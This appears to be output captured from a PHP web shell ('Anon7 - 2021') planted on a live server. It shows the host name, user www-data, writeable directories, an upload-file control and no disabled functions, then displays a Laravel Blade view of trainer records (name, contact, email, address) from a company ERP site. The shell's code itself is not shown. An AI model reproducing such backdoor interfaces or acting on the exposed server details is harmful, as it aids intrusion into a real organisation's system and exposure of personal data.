KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1525618.contaboserver.net 5.4.0-105-generic #119-Ubuntu SMP Mon Mar 7 18:49:24 UTC 2022 x86_64
User : www-data ( 33)
PHP Version : 8.2.12
Disable Function : NONE
Directory :  /var/www/erp.theinteractive.co.in/resources/views/trainer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/erp.theinteractive.co.in/resources/views/trainer/show.blade.php
<div class="modal-body">
    <div class="row">
        <div class="col-12">
            <table class="footable-details table table-striped table-hover toggle-circle">
                <tbody>
                <tr>
                    <td class="text-dark">{{__('Company')}}</td>
                    <td style="display: table-cell;"> {{ !empty($trainer->branches)?$trainer->branches->name:'' }}</td>
                </tr>
                <tr>
                    <td class="text-dark">{{__('First Name')}}</td>
                    <td style="display: table-cell;">{{$trainer->firstname}}</td>
                </tr>
                <tr>
                    <td class="text-dark">{{__('Last Name')}}</td>
                    <td style="display: table-cell;">{{$trainer->lastname}}</td>
                </tr>
                <tr>
                    <td class="text-dark">{{__('Contact Number')}}</td>
                    <td style="display: table-cell;">{{$trainer->contact}}</td>
                </tr>
                <tr>
                    <td class="text-dark">{{__('Email')}}</td>
                    <td style="display: table-cell;">{{$trainer->email}}</td>
                </tr>
                <tr>
                    <td class="text-dark">{{__('Expertise')}}</td>
                    <td style="display: table-cell;">{{$trainer->expertise}}</td>
                </tr>
                <tr>
                    <td class="text-dark">{{__('Address')}}</td>
                    <td style="display: table-cell;">{{$trainer->address}}</td>
                </tr>
                </tbody>
            </table>
        </div>
    </div>
</div>

Anon7 - 2021